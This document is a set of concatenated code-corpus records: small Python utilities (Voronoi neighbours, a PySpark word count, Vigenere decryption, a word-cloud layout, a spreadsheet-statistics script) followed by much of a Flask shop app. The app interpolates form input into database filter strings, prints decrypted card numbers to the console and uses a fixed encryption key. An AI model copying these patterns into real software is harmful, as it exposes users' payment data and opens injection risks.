for e in row]\n mol = self.lbs[ind]\n a[0:len(row) + 1] = mol\n mols.append(a)\n\n mols = np.array(mols)\n\n mols_, cnts = np.unique(mols, axis=0, return_counts=True)\n mols_ = mols_[np.argsort(cnts)[::-1]]\n cnts_ = cnts[np.argsort(cnts)[::-1]]\n # remove boundary\n idx = np.where(np.all(mols_ == [-1] * mols_.shape[1], axis=1))[0][0]\n mols_ = np.delete(mols_, idx, axis=0)\n cnts_ = np.delete(cnts_, idx)\n mask = cnts_/(cnts_.sum()) > t\n return mols_[mask], cnts_[mask]\n\n def get_all_mols(self):\n mols = []\n\n k_max = np.max([len(row) for row in self.inds]) + 1\n for i, row in enumerate(self.inds):\n a = np.array([-1] * k_max)\n if row[0] == -1:\n mols.append(a)\n else:\n ind = [i] + [e for e in row]\n mol = self.lbs[ind]\n a[0:len(row) + 1] = mol\n mols.append(a)\n\n mols = np.array(mols)\n return mols\n\n def show_k(self, ax=None, **kwargs):\n if ax is None:\n fig, ax = plt.subplots(1, 1, figsize=(7.2, 7.2))\n\n ks = self.ks.copy()\n ks[ks == 1] = 100\n ksmin = ks.min()\n ks = ks - (ksmin - 1)\n ks[ks > 100 - ksmin - 1] = 0\n cs = np.array(['#2d3742'] + ['C{}'.format(i) for i in range(9)])\n ax.scatter(self.pts[:, 0], self.pts[:, 1], color=cs[ks], **kwargs)\n\n\n\n\n\n\n\n# use Delaunay to get vnn, but difficult to get L\ndef get_voronoi_nbrs(pts):\n tri = Delaunay(pts)\n indptr, inds = tri.vertex_neighbor_vertices\n vnn = []\n # indptr has a shape (npoints + 1,)\n for i in range(len(indptr) - 1):\n vnn.append(list(inds[indptr[i]:indptr[i + 1]]))\n return vnn","sub_path":"spatial/voronoi_neighbors.py","file_name":"voronoi_neighbors.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"301667342","text":"#!/usr/bin/env python\n\n# read a stream from a local host\nfrom pyspark.sql.functions import explode, split\nimport pyspark\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\nlogger = logging.getLogger('ai.applecare')\nlogger.setLevel(logging.DEBUG)\n\nlogger.debug('setup spark')\nspark = (pyspark.sql.SparkSession\n .builder\n .appName('ch2 read stram')\n 
.getOrCreate())\n\nspark.sparkContext.setLogLevel('INFO')\n\nport = 8888\nlogger.debug(f'read Stream from {port}')\nlines = (spark\n .readStream\n .format('socket')\n .option('host', 'localhost')\n .option('port', port)\n .load())\n\n# Perform transformations\n# Split the lines into words\n\nlogger.info('Exploding words')\nwords = lines.select(\n explode(split(lines.value, \" \"))\n .alias(\"word\"))\n\nlogger.info('word counts')\n# Generate running word count\nword_counts = words.groupBy('word').count()\n\n\nlogger.info('kafka query')\n# write out to the stream to Kafka\nquery = (word_counts\n .writeStream\n .format('kafka')\n .option('topic', 'output'))\n\n\n","sub_path":"lrn-spark/notebooks/ch1-lrn-spark-read-stream.py","file_name":"ch1-lrn-spark-read-stream.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66112296","text":"#Vigenere Decrypt\r\n\r\ndef decrypt(key,text):\r\n result=[]\r\n key_index = 0\r\n #letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ ',.!1234567890[]}{@#£$%^&*?()_+abcdefghijklmnopqrstuvwxyz\"\r\n\r\n\r\n for letter in text:\r\n num = letters.find(letter)\r\n num -= letters.find(key[key_index])\r\n num %= len(letters)\r\n\r\n result.append(letters[num])\r\n\r\n key_index += 1\r\n if key_index == len(key):\r\n key_index = 0\r\n \r\n\r\n return''.join(result)\r\n","sub_path":"fileencrypter/PyVigDec.py","file_name":"PyVigDec.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"402949253","text":"# Python 3\r\n# -*- coding: utf-8 -*-\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nfrom random import randint\r\nfrom wordcloud_handler.colourscale import Colourscale\r\nfrom wordcloud_handler.fontsize import FontSize\r\n\r\n\r\nclass RandomizedWordCloud(object):\r\n\r\n def create_wordcloud(self, words, wordcounts, colourscale, docname):\r\n image = Image.new(\"RGB\", (1250,600), (0, 10, 30))\r\n draw = ImageDraw.Draw(image)\r\n colourscale_index = 0\r\n fontsizes = FontSize().proportion_fontsize(wordcounts)\r\n counter = 1\r\n\r\n ax_collector = []\r\n bx_collector = []\r\n ay_collector = []\r\n by_collector = []\r\n dx_collector = []\r\n dy_collector = []\r\n\r\n ax = randint(70, 850) \r\n ay = randint(50, 500)\r\n\r\n fontsize = fontsizes[0]\r\n font = ImageFont.truetype('Trebuchet MS.ttf', fontsize)\r\n text = words[0] + \"(\" + str(int(wordcounts[0])) + \")\"\r\n wordwidth, wordheight = font.getsize(text)\r\n\r\n draw.text((ax, ay), words[0] + \"(\" + str(int(wordcounts[0])) + \")\", font=font, fill=(colourscale[0][colourscale_index],colourscale[1][colourscale_index],colourscale[2][colourscale_index]))\r\n\r\n by = ay\r\n bx = ax + wordwidth\r\n dx = ax + wordwidth\r\n dy = by + wordheight\r\n\r\n ax_collector.append(ax)\r\n ay_collector.append(ay)\r\n bx_collector.append(bx)\r\n by_collector.append(by) \r\n dx_collector.append(dx) \r\n dy_collector.append(dy)\r\n\r\n index = 0\r\n check = 0\r\n collector_endindex = 0 \r\n\r\n while collector_endindex < len(ax_collector) and counter < len(words):\r\n fontsize = fontsizes[counter]\r\n font = ImageFont.truetype('Trebuchet MS.ttf', fontsize)\r\n text = words[counter] + \"(\" + str(int(wordcounts[counter])) + \")\"\r\n wordwidth, wordheight = font.getsize(text)\r\n\r\n colourscale_index = Colourscale().get_colourscale_index(fontsize, fontsizes)\r\n\r\n # Kontrollstrukturen zur Gewährleistung, 
dass es an zu keiner Wortüberschneidung kommt\r\n if ax <= ax_collector[index] and dx >= ax_collector[index] and ay <= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and ax <= dx_collector[index] and ay <= ay_collector[index] and dy >= ay_collector[index] or \\\r\n ax <= ax_collector[index] and dx >= ax_collector[index] and ay >= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and ax <= dx_collector[index] and ay >= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and dx <= dx_collector[index] and ay >= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and dx <= dx_collector[index] and ay <= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax < ax_collector[index] and dx > dx_collector[index] and ay >= ay_collector[index] and dy <= dy_collector[index] or \\\r\n ax < ax_collector[index] and dx > dx_collector[index] and ay < ay_collector[index] and dy > dy_collector[index]:\r\n check = 1\r\n index = index + 1\r\n collector_endindex = collector_endindex + 1\r\n else:\r\n index = index + 1\r\n collector_endindex = collector_endindex + 1\r\n if collector_endindex == len(ax_collector) and check == 0:\r\n draw.text((ax, ay), words[counter] + \"(\" + str(int(wordcounts[counter])) + \")\", font=font, fill=(colourscale[0][colourscale_index],colourscale[1][colourscale_index],colourscale[2][colourscale_index]))\r\n\r\n by = ay\r\n bx = ax + wordwidth\r\n dx = ax + wordwidth\r\n dy = by + wordheight\r\n\r\n ax_collector.append(ax)\r\n ay_collector.append(ay)\r\n bx_collector.append(bx)\r\n by_collector.append(by)\r\n dx_collector.append(dx)\r\n dy_collector.append(dy)\r\n\r\n counter = counter + 1\r\n if collector_endindex == len(ax_collector) and check == 1:\r\n ax = randint(70, 850) \r\n ay = randint(50, 500)\r\n\r\n by = ay\r\n bx = ax + wordwidth\r\n dx = ax + wordwidth\r\n dy = by + wordheight\r\n\r\n check = 0\r\n collector_endindex = 0\r\n index = 0\r\n\r\n #image.show()\r\n image.save(\"{}.png\".format(docname))\r\n","sub_path":"wordcloud_handler/randomlayout_wordcloud.py","file_name":"randomlayout_wordcloud.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363517441","text":"def longest_intersection(n):\r\n long_inter = []\r\n for _ in range(n):\r\n\r\n first, second = input().split(\"-\")\r\n first_start, first_end = map(int, first.split(\",\"))\r\n second_start, second_end = map(int, second.split(\",\"))\r\n\r\n first = []\r\n second = []\r\n\r\n for i in range(first_start, first_end + 1):\r\n first.append(i)\r\n\r\n for x in range(second_start, second_end + 1):\r\n second.append(x)\r\n\r\n inter = set(first) & set(second)\r\n\r\n if len(long_inter) < len(inter):\r\n long_inter = list(inter)\r\n\r\n print(f'Longest intersection is {long_inter} with length {len(long_inter)}')\r\n\r\n\r\nlongest_intersection(int(input()))","sub_path":"Python_ProgramingAdvanced/Tuples and Sets - Exercises/6. Longest Intersection.py","file_name":"6. 
Longest Intersection.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494216326","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport re\nimport csv\nimport pandas as pd\nimport numpy as np\nimport pyexcel_io\nfrom pyexcel_xls import get_data\nfrom pyexcel_xls import save_data\nimport xlrd\n# 遍历指定目录,显示目录下的所有文件名\ndef eachFile2(filepath):\n pathDir = os.listdir(filepath)\n for allDir in pathDir:\n child = os.path.join(\"%s\\%s\" % (filepath, allDir))\n if os.path.isdir(child):\n eachFile(child)\n else:\n '''\n #if re.search('AU',child,re.M|re.I)!=None and re.search('test',child,re.M|re.I)==None:\n if re.search('AU', child, re.M | re.I) != None or \\\n re.search('log', child, re.M | re.I) != None\\\n or re.search('BDI', child, re.M | re.I) != None\\\n or re.search('实验记录表', child, re.M | re.I) != None:'''\n if re.search('log', child, re.M | re.I) != None:\n print(child)\n readFile1(child, filepath)\n # else:\n # os.remove(child)\n\n#def readFile1(filename,filepath):\n\n\ndef eachFile(filepath):\n pathDir = os.listdir(filepath)\n for allDir in pathDir:\n child = os.path.join(\"%s\\%s\" % (filepath, allDir))\n if os.path.isdir(child):\n eachFile(child)\n else:\n '''\n #if re.search('AU',child,re.M|re.I)!=None and re.search('test',child,re.M|re.I)==None:\n if re.search('AU', child, re.M | re.I) != None or \\\n re.search('log', child, re.M | re.I) != None\\\n or re.search('BDI', child, re.M | re.I) != None\\\n or re.search('实验记录表', child, re.M | re.I) != None:'''\n if re.search('AU', child, re.M | re.I) != None:\n print(child)\n readFile(child,filepath)\n #else:\n #os.remove(child)\n\n\n# 读取文件内容并打印\ndef readFile(filename,filepath):\n Line=[]\n fopen = open(filename, 'r') # r 代表read\n for eachLine in fopen:\n lines=eachLine.split(',')\n Line.append(lines)\n fopen.close()\n Lines=np.array(Line)\n x=Lines.shape[0]\n y=Lines.shape[1]\n #print(x)\n #print(y)\n sum=[0]*19\n max=[-100]*19\n min=[100]*19\n variance=[0]*19\n average=[0]*19\n print(sum)\n for j in range(0,y-1):\n for i in range(1,x):\n #print(Lines[i][j])\n sum[j]=float(Lines[i][j])+sum[j]\n if float(Lines[i][j])>max[j]:\n max[j]=float(Lines[i][j])\n if float(Lines[i][j]) 0\"\n )\n return render_template(\"index.html\", products=products)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for(\"index\"))\n\n form = forms.LoginForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n try:\n user = SecureDB.retrieve(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n )[0]\n except:\n flash(\n \"Incorrect username and/or password. Please try again.\",\n \"danger\",\n )\n return redirect(url_for(\"login\"))\n\n salt = user.password[-6:]\n salted_password = form.password.data + salt\n\n if not check_password_hash(user.password[:-6], salted_password):\n flash(\n \"Incorrect username and/or password. Please try again.\",\n \"danger\",\n )\n return redirect(url_for(\"login\"))\n\n redirect_to_profile = False\n\n with open(\"PwnedPasswordTop100k.txt\", \"r\", encoding=\"UTF-8\") as file:\n for insecure_password in file.read().splitlines():\n if form.password.data == insecure_password:\n flash(\n \"Your password is easily guessable or has been \"\n \"compromised in a data breach. 
Please change your \"\n \"password as soon as possible.\",\n \"danger\",\n )\n redirect_to_profile = True\n\n if not user.status:\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n values={\"status\": True},\n )\n\n login_user(user, remember=form.remember.data)\n\n if redirect_to_profile:\n return redirect(url_for(\"profile\"))\n\n next_url = request.args.get(\"next\")\n\n if next_url is not None and is_safe_url(next_url):\n return redirect(next_url)\n\n return redirect(url_for(\"index\"))\n\n return render_template(\n \"login.html\", form=form, next=request.args.get(\"next\")\n )\n\n\n@app.route(\"/signup\", methods=[\"GET\", \"POST\"])\ndef signup():\n if current_user.is_authenticated:\n return redirect(url_for(\"index\"))\n\n form = forms.RegisterForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n if not (\n SecureDB.retrieve(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n )\n or SecureDB.retrieve(\n model=\"User\", filter_=f\"User.email == '{form.email.data}'\"\n )\n ):\n letters_and_digits = string.ascii_letters + string.digits\n salt = \"\".join(\n (secrets.choice(letters_and_digits) for _ in range(6))\n )\n salted_password = form.password.data + salt\n hashed_password = generate_password_hash(\n salted_password, method=\"sha256\"\n )\n hashed_password_with_salt = hashed_password + salt\n new_user = User(\n username=form.username.data,\n email=form.email.data,\n password=hashed_password_with_salt,\n date_created=datetime.datetime.now(),\n status=True,\n )\n\n created_user = SecureDB.create(model=\"User\", object_=new_user)\n\n customer_role = SecureDB.retrieve(\n model=\"Role\", filter_=\"Role.name == 'Customer'\"\n )[0]\n user_role = UserRole(\n user_id=created_user.id,\n role_id=customer_role.id,\n role=customer_role,\n )\n\n SecureDB.create(model=\"UserRole\", object_=user_role)\n return redirect(url_for(\"login\"))\n\n return redirect(url_for(\"signup\"))\n\n return render_template(\"signup.html\", form=form)\n\n\n@app.route(\"/logout\", methods=[\"POST\"])\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/profile\", methods=[\"GET\", \"POST\"])\n@login_required\ndef profile():\n form = forms.UpdateForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n salt = current_user.password[-6:]\n salted_password = form.current_password.data + salt\n\n if check_password_hash(current_user.password[:-6], salted_password):\n if form.email.data != \"\":\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"email\": form.email.data},\n )\n\n if form.username.data != \"\":\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"username\": form.username.data},\n )\n\n if form.new_password.data != \"\":\n letters_and_digits = string.ascii_letters + string.digits\n salt = \"\".join(\n (secrets.choice(letters_and_digits) for _ in range(6))\n )\n salted_password = form.new_password.data + salt\n hashed_password = generate_password_hash(\n salted_password, method=\"sha256\"\n )\n hashed_password_with_salt = hashed_password + salt\n\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"password\": hashed_password_with_salt},\n )\n\n return redirect(url_for(\"profile\"))\n\n return render_template(\"profile.html\", current_user=current_user, form=form)\n\n\n@app.route(\"/orders\")\n@login_required\ndef orders():\n 
return render_template(\"orders.html\", current_user=current_user)\n\n\n@app.route(\"/cards\")\n@login_required\ndef cards():\n user = SecureDB.retrieve(\n model=\"User\", filter_=f\"User.id == {current_user.id}\"\n )[0]\n credit_cards = user.credit_cards\n key = aes.get_fixed_key()\n card_list = []\n\n for credit_card in credit_cards:\n card = aes.decrypt(key, credit_card.card_number, credit_card.iv).decode(\n \"utf8\"\n )\n card_list.append(card)\n\n print(card_list)\n return render_template(\n \"cards.html\",\n current_user=current_user,\n card_list=card_list,\n len=len,\n credit_cards=credit_cards,\n )\n\n\n@app.route(\"/cards/add\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_cards():\n try:\n if request.method == \"POST\":\n obj = request.json\n cardnum = obj[\"cardnum\"]\n print(cardnum)\n\n if cardnum.isalpha() or len(cardnum) == 0:\n raise Exception(\"Integer only\")\n\n key = aes.get_fixed_key()\n card_number, iv = aes.encrypt(key, cardnum.encode(\"utf8\"))\n exp_date = obj[\"exp_date\"]\n print(exp_date)\n year = exp_date[0:4]\n month = exp_date[5:7]\n day = exp_date[8:]\n date = datetime.datetime(int(year), int(month), int(day))\n\n credit_card = CreditCard(\n user_id=current_user.id,\n card_number=card_number,\n expiry=date,\n iv=iv,\n )\n SecureDB.create(model=\"CreditCard\", object_=credit_card)\n\n return redirect(url_for(\"cards\"))\n\n return render_template(\"add-cards.html\", current_user=current_user)\n except:\n flash(\"An error has occurred\", \"danger\")\n return redirect(url_for(\"add_cards\"))\n\n\n@app.route(\"/cards/remove/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef remove_card(card_id):\n SecureDB.delete(model=\"CreditCard\", filter_=f\"CreditCard.id == {card_id}\")\n return redirect(url_for(\"cards\"))\n\n\n@app.route(\"/cards/update/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef update_card(card_id):\n try:\n form = forms.CreditForm(request.form)\n key = aes.get_fixed_key()\n\n try:\n card = SecureDB.retrieve(\n model=\"CreditCard\", filter_=f\"CreditCard.id == {card_id}\"\n )[0]\n except:\n abort(404)\n\n credit_card_number = aes.decrypt(key, card.card_number, card.iv).decode(\n \"utf8\"\n )\n\n if request.method == \"POST\":\n obj = request.json\n cardnum = obj[\"cardnum\"]\n\n if cardnum.isalpha() or len(cardnum) == 0:\n raise Exception(\"Integer only\")\n\n key = aes.get_fixed_key()\n card_number, iv = aes.encrypt(key, cardnum.encode(\"utf8\"))\n exp_date = obj[\"exp_date\"]\n print(exp_date)\n year = exp_date[0:4]\n month = exp_date[5:7]\n day = exp_date[8:]\n date = datetime.datetime(int(year), int(month), int(day))\n\n SecureDB.update(\n model=\"CreditCard\",\n filter_=f\"CreditCard.id == {card_id}\",\n values={\n \"card_number\": card_number.hex(),\n \"iv\": iv.hex(),\n \"expiry\": date.strftime(\"%Y-%m-%d\"),\n },\n )\n return redirect(url_for(\"cards\"))\n\n return render_template(\n \"update-card.html\",\n current_user=current_user,\n form=form,\n card=card,\n credit_card_number=credit_card_number,\n )\n except:\n flash(\"An error has occurred\", \"danger\")\n return redirect(url_for(\"cards\"))\n\n\n@app.route(\"/addresses\")\n@login_required\ndef addresses():\n return render_template(\"addresses.html\", current_user=current_user)\n\n\n@app.route(\"/addresses/add\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_addresses():\n if request.method == \"POST\":\n obj = request.json\n address = obj[\"address\"]\n state = obj[\"state\"]\n city = obj[\"city\"]\n zip_code = obj[\"zipCode\"]\n\n address_object = 
Address(\n            user_id=current_user.id,\n            address=address,\n            state=state,\n            city=city,\n            zip_code=int(zip_code),\n        )\n        SecureDB.create(model=\"Address\", object_=address_object)\n\n        return redirect(url_for(\"addresses\"))\n\n    return render_template(\"add-addresses.html\", current_user=current_user)\n\n\n@app.route(\"/addresses/remove/<int:address_id>\")\n@login_required\ndef remove_addresses(address_id):\n    SecureDB.delete(model=\"Address\", filter_=f\"Address.id == {address_id}\")\n    return redirect(url_for(\"addresses\"))\n\n\n@app.route(\"/addresses/update/<int:address_id>\", methods=[\"GET\", \"POST\"])\n@login_required\ndef update_address(address_id):\n    form = forms.AddressForm(request.form)\n\n    try:\n        address = SecureDB.retrieve(\n            model=\"Address\", filter_=f\"Address.id == {address_id}\"\n        )[0]\n    except:\n        abort(404)\n\n    if request.method == \"POST\" and form.validate():\n        SecureDB.update(\n            model=\"Address\",\n            filter_=f\"Address.id == {address_id}\",\n            values={\n                \"address\": form.address.data,\n                \"state\": form.state.data,\n                \"city\": form.city.data,\n                \"zip_code\": form.zip_code.data,\n            },\n        )\n        return redirect(url_for(\"addresses\"))\n\n    return render_template(\n        \"update-address.html\",\n        current_user=current_user,\n        form=form,\n        address=address,\n    )\n\n\n@app.route(\"/profile/delete\")\n@login_required\ndef delete_profile():\n    SecureDB.update(\n        model=\"User\",\n        filter_=f\"User.id == {current_user.id}\",\n        values={\"status\": False},\n    )\n    logout_user()\n    return redirect(url_for(\"index\"))\n\n\n@app.route(\"/admin\")\n@login_required\n@restricted(access_level=\"admin page\")\ndef admin():\n    context = {\n        \"current_user\": current_user,\n        \"users\": SecureDB.retrieve(model=\"User\", filter_=\"User.id > 0\"),\n        \"products\": SecureDB.retrieve(\n            model=\"Product\", filter_=\"Product.product_id > 0\"\n        ),\n        \"current_user_roles\": [\n            user_role.role.name for user_role in current_user.roles\n        ],\n    }\n    return render_template(\"admin.html\", **context)\n\n\n@app.route(\"/admin/create/user\", methods=[\"GET\", \"POST\"])\n@login_required\n@restricted(access_level=\"admin\")\ndef staff_signup():\n    form = forms.AdminCreateForm(request.form)\n\n    if request.method == \"POST\" and form.validate():\n        if not (\n            SecureDB.retrieve(\n                model=\"User\",\n                filter_=f\"User.username == '{form.username.data}'\",\n            )\n            or SecureDB.retrieve(\n                model=\"User\", filter_=f\"User.email == '{form.email.data}'\"\n            )\n        ):\n            letters_and_digits = string.ascii_letters + string.digits\n            salt = \"\".join(\n                (secrets.choice(letters_and_digits) for _ in range(6))\n            )\n            salted_password = form.password.data + salt\n            hashed_password = generate_password_hash(\n                salted_password, method=\"sha256\"\n            )\n            hashed_password_with_salt = hashed_password + salt\n\n            new_user = User(\n                username=form.username.data,\n                email=form.email.data,\n                password=hashed_password_with_salt,\n                date_created=datetime.datetime.now(),\n                status=True,\n            )\n\n            created_user = SecureDB.create(model=\"User\", object_=new_user)\n\n            customer_role = SecureDB.retrieve(\n                model=\"Role\", filter_=\"Role.name == 'Customer'\"\n            )[0]\n            new_user_customer_role = UserRole(\n                user_id=created_user.id,\n                role_id=customer_role.id,\n                role=customer_role,\n            )\n\n            staff_role = SecureDB.retrieve(\n                model=\"Role\", filter_=\"Role.name == 'Staff'\"\n            )[0]\n            new_user_staff_role = UserRole(\n                user_id=created_user.id,\n                role_id=staff_role.id,\n                role=staff_role,\n            )\n\n            SecureDB.create(model=\"UserRole\", object_=new_user_customer_role)\n            SecureDB.create(model=\"UserRole\", object_=new_user_staff_role)\n            return 
redirect(url_for(\"admin\"))\n\n return redirect(url_for(\"staff_signup\"))\n\n return render_template(\"signup.html\", form=form)\n\n\n@app.route(\"/admin/delete/\")\n@login_required\n@restricted(access_level=\"admin\")\ndef admin_delete(user_id):\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {user_id}\",\n values={\"status\": False},\n )\n return redirect(url_for(\"admin\"))\n\n\n@app.route(\"/product/\", methods=[\"GET\", \"POST\"])\ndef product(product_id):\n form = forms.ReviewForm(request.form)\n product_quantity = forms.ProductQuantity(request.form)\n\n try:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n\n if product.deleted:\n raise Exception\n except:\n abort(404)\n\n reviews = sorted(\n SecureDB.retrieve(\n model=\"Review\", filter_=f\"Review.product_id == {product_id}\"\n ),\n key=lambda x: x.rating,\n )\n reviews = list(\n zip(\n [\n SecureDB.retrieve(\n model=\"User\", filter_=f\"User.id == {review.user_id}\"\n )[0].username\n for review in reviews\n ],\n reviews,\n )\n )\n sort_by = request.args.get(\"sort-by\")\n\n if sort_by != \"lowest-rating\":\n reviews.reverse()\n\n user_bought = False\n\n if current_user.is_authenticated:\n try:\n user_review = SecureDB.retrieve(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.\"\n f\"product_id == {product_id})\"\n ),\n )[0]\n user_bought = True\n form.review_rating.data = str(user_review.rating)\n form.review_contents.data = user_review.contents\n except:\n user_review = None\n user_orders = SecureDB.retrieve(\n model=\"Orders\", filter_=f\"Orders.user_id == {current_user.id}\"\n )\n\n for user_order in user_orders:\n break_outer_loop = False\n\n for order_product in user_order.order_product:\n if order_product.product_id == product_id:\n user_bought = True\n break_outer_loop = True\n break\n\n if break_outer_loop:\n break\n else:\n user_review = None\n\n if product_quantity.submit.data and product_quantity.validate():\n quantity = product_quantity.product_quantity.data\n return redirect(\n url_for(\"add_to_cart\", product_id=product_id, quantity=quantity)\n )\n\n return render_template(\n \"product.html\",\n product=product,\n form=form,\n reviews=reviews,\n user_review=user_review,\n user_bought=user_bought,\n product_quantity=product_quantity,\n )\n\n\n@app.route(\"/add-review/\", methods=[\"POST\"])\ndef add_review(product_id):\n if not current_user.is_authenticated:\n abort(400)\n\n form = forms.ReviewForm(request.form)\n\n if form.validate():\n try:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n except:\n print(\"No such product.\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n if SecureDB.retrieve(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.product_id \"\n f\"== {product_id})\"\n ),\n ):\n print(\"User already submitted a review for this product.\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n user_orders = SecureDB.retrieve(\n model=\"Orders\", filter_=f\"Orders.user_id == {current_user.id}\"\n )\n user_bought = False\n\n for user_order in user_orders:\n break_outer_loop = False\n\n for order_product in user_order.order_product:\n if order_product.product_id == product_id:\n user_bought = True\n break_outer_loop = True\n break\n\n if break_outer_loop:\n break\n\n if not user_bought:\n print(\"User haven't bought the product.\")\n return redirect(url_for(\"product\", 
product_id=product_id))\n\n review = Review(\n user_id=current_user.id,\n product_id=product_id,\n rating=form.review_rating.data,\n contents=form.review_contents.data,\n product=product,\n )\n SecureDB.create(model=\"Review\", object_=review)\n\n flash(\"Review added successfully.\", \"success\")\n else:\n flash(\"There was an error while adding your review.\", \"danger\")\n\n return redirect(url_for(\"product\", product_id=product_id))\n\n\n@app.route(\"/edit-review/\", methods=[\"POST\"])\ndef edit_review(product_id):\n if not current_user.is_authenticated:\n abort(400)\n\n form = forms.ReviewForm(request.form)\n\n if form.validate():\n try:\n SecureDB.update(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.\"\n f\"product_id == {product_id})\"\n ),\n values={\n \"rating\": form.review_rating.data,\n \"contents\": form.review_contents.data,\n },\n )\n except:\n print(\n \"No such user and/or product, or user haven't submitted a \"\n \"review for this product.\"\n )\n return redirect(url_for(\"product\", product_id=product_id))\n\n flash(\"Review edited successfully.\", \"success\")\n else:\n flash(\"There was an error while editing your review.\", \"danger\")\n\n return redirect(url_for(\"product\", product_id=product_id))\n\n\n@app.route(\"/delete-review/\", methods=[\"POST\"])\ndef delete_review(product_id):\n if not current_user.is_authenticated:\n abort(400)\n\n try:\n SecureDB.delete(\n model=\"Review\",\n filter_=(\n f\"(Review.user_id == {current_user.id}) & (Review.\"\n f\"product_id == {product_id})\"\n ),\n )\n except:\n print(\n \"No such user and/or product, or user haven't submitted a review \"\n \"for this product.\"\n )\n return redirect(url_for(\"product\", product_id=product_id))\n\n flash(\"Review deleted successfully.\", \"success\")\n return redirect(url_for(\"product\", product_id=product_id))\n\n\n@app.route(\n \"/add-to-cart//\", methods=[\"GET\", \"POST\"]\n)\ndef add_to_cart(product_id, quantity):\n try:\n product = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n except:\n abort(404)\n\n if quantity > product.quantity or product.quantity == 0:\n flash(\"There is not enough quantity\", \"warning\")\n return redirect(url_for(\"index\"))\n\n try:\n cart = session[\"cart\"]\n product = cart[0]\n product = {int(k): int(v) for k, v in product.items()}\n\n if product_id in product:\n cart_quantity = product[product_id]\n product[product_id] = int(cart_quantity) + int(quantity)\n cart[0] = product\n session[\"cart\"] = cart\n print(cart)\n return redirect(url_for(\"cart\"))\n except:\n print(\"No other item\")\n cart = []\n product = dict()\n\n product[int(product_id)] = int(quantity)\n print(product)\n\n if len(cart) == 0:\n cart.append(product)\n else:\n cart[0] = product\n\n session[\"cart\"] = cart\n return redirect(url_for(\"cart\"))\n\n\n@app.route(\"/delete-from-cart/\", methods=[\"POST\", \"GET\"])\ndef delete_from_cart(product_id):\n cart = session[\"cart\"][0]\n cart.pop(product_id, None)\n session[\"cart\"] = cart\n return redirect(url_for(\"cart\"))\n\n\n@app.route(\"/cart\", methods=[\"POST\", \"GET\"])\ndef cart():\n try:\n cart = []\n product = {}\n cart.append(product)\n\n try:\n cart = session[\"cart\"]\n print(cart)\n product = cart[0]\n except:\n print(\"No other item\")\n\n product_list = []\n\n for product_id in product:\n products = SecureDB.retrieve(\n model=\"Product\", filter_=f\"Product.product_id == {product_id}\"\n )[0]\n product_list.append(products)\n\n 
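# add_to_cart(), delete_from_cart() and cart() above all treat the session
# cart as a one-element list whose slot 0 maps product_id -> quantity, e.g.
# session["cart"] == [{1: 2, 7: 1}]. The int() casts exist because Flask's
# JSON-based session serialisation turns integer dict keys into strings
# between requests. The merge step of add_to_cart() as a pure function
# (a sketch, not part of the original module):
def merge_into_cart(cart, product_id, quantity):
    items = {int(k): int(v) for k, v in (cart[0] if cart else {}).items()}
    items[int(product_id)] = items.get(int(product_id), 0) + int(quantity)
    return [items]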
